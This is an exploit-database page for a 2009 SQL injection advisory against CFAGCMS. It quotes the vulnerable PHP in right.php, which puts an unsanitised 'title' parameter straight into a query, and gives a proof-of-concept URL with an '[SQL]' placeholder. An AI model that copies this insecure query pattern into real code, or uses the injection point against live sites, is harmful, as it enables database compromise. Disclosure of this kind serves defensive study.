[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CFAGCMS SQL Injection Exploit

Author
cr4wl3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10334
Category
web applications
Date add
19-12-2009
Platform
unsorted
=============================
CFAGCMS SQL Injection Exploit
=============================

################################################################################
## Exploit Title: CFAGCMS SQL Injection Exploit                               ##
## Date: 20-12-2009                                                           ##
## Author: cr4wl3r                                                            ##
## Software Link: http://sourceforge.net/project/showfiles.php?group_id=197936##
## Version: N/A                                                               ##
## Tested on: GNU/LINUX                                                       ##
################################################################################
 
 
~ Code [right.php]
 
$title  = $_GET['title'];
$query  = "SELECT * FROM pages WHERE title = '".$title."'";
$result = mysql_query($query);
 
~ PoC
 
[cfagcms_path]/right.php?title=[SQL]



#  0day.today [2024-12-24]  #